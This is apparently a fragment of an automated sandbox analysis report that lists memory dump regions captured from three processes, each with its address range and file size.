                                                                  • memory/404-64-0x0000017F42010000-0x0000017F420C2000-memory.dmp

                                                                    Filesize

                                                                    712KB

                                                                  • memory/404-8-0x0000017F3D7E0000-0x0000017F3DF9E000-memory.dmp

                                                                    Filesize

                                                                    7.7MB

                                                                  • memory/404-9-0x0000017F3E640000-0x0000017F3ECD2000-memory.dmp

                                                                    Filesize

                                                                    6.6MB

                                                                  • memory/404-30-0x0000017F41B90000-0x0000017F41CB4000-memory.dmp

                                                                    Filesize

                                                                    1.1MB

                                                                  • memory/404-29-0x00007FFD24530000-0x00007FFD24FF2000-memory.dmp

                                                                    Filesize

                                                                    10.8MB

                                                                  • memory/404-28-0x00007FFD24530000-0x00007FFD24FF2000-memory.dmp

                                                                    Filesize

                                                                    10.8MB

                                                                  • memory/404-25-0x00007FFD24530000-0x00007FFD24FF2000-memory.dmp

                                                                    Filesize

                                                                    10.8MB

                                                                  • memory/404-24-0x00007FFD24530000-0x00007FFD24FF2000-memory.dmp

                                                                    Filesize

                                                                    10.8MB

                                                                  • memory/404-23-0x00007FFD24530000-0x00007FFD24FF2000-memory.dmp

                                                                    Filesize

                                                                    10.8MB

                                                                  • memory/404-10-0x0000017F3DFA0000-0x0000017F3E33C000-memory.dmp

                                                                    Filesize

                                                                    3.6MB

                                                                  • memory/404-21-0x0000017F3AB80000-0x0000017F3AB8A000-memory.dmp

                                                                    Filesize

                                                                    40KB

                                                                  • memory/404-0-0x00007FFD24533000-0x00007FFD24535000-memory.dmp

                                                                    Filesize

                                                                    8KB

                                                                  • memory/404-17-0x00007FFD24533000-0x00007FFD24535000-memory.dmp

                                                                    Filesize

                                                                    8KB

                                                                  • memory/404-16-0x0000017F3D580000-0x0000017F3D62A000-memory.dmp

                                                                    Filesize

                                                                    680KB

                                                                  • memory/404-15-0x00007FFD24530000-0x00007FFD24FF2000-memory.dmp

                                                                    Filesize

                                                                    10.8MB

                                                                  • memory/404-14-0x0000017F3E340000-0x0000017F3E552000-memory.dmp

                                                                    Filesize

                                                                    2.1MB

                                                                  • memory/404-13-0x00007FFD24530000-0x00007FFD24FF2000-memory.dmp

                                                                    Filesize

                                                                    10.8MB

                                                                  • memory/404-12-0x0000017F396F0000-0x0000017F39710000-memory.dmp

                                                                    Filesize

                                                                    128KB

                                                                  • memory/404-11-0x0000017F3ECE0000-0x0000017F3F164000-memory.dmp

                                                                    Filesize

                                                                    4.5MB

                                                                  • memory/4408-70-0x000000001ABE0000-0x000000001ABFE000-memory.dmp

                                                                    Filesize

                                                                    120KB

                                                                  • memory/4408-61-0x0000000000040000-0x0000000000058000-memory.dmp

                                                                    Filesize

                                                                    96KB

                                                                  • memory/4408-92-0x000000001C190000-0x000000001C1B0000-memory.dmp

                                                                    Filesize

                                                                    128KB

                                                                  • memory/4408-68-0x000000001BF10000-0x000000001BF86000-memory.dmp

                                                                    Filesize

                                                                    472KB

                                                                  • memory/4408-69-0x000000001ABA0000-0x000000001ABAE000-memory.dmp

                                                                    Filesize

                                                                    56KB

                                                                  • memory/4528-111-0x0000000007140000-0x000000000714A000-memory.dmp

                                                                    Filesize

                                                                    40KB

                                                                  • memory/4528-97-0x0000000005D60000-0x0000000006306000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/4528-96-0x0000000005510000-0x00000000055AC000-memory.dmp

                                                                    Filesize

                                                                    624KB

                                                                  • memory/4528-95-0x0000000005470000-0x0000000005502000-memory.dmp

                                                                    Filesize

                                                                    584KB

                                                                  • memory/4528-93-0x0000000000400000-0x0000000000410000-memory.dmp

                                                                    Filesize

                                                                    64KB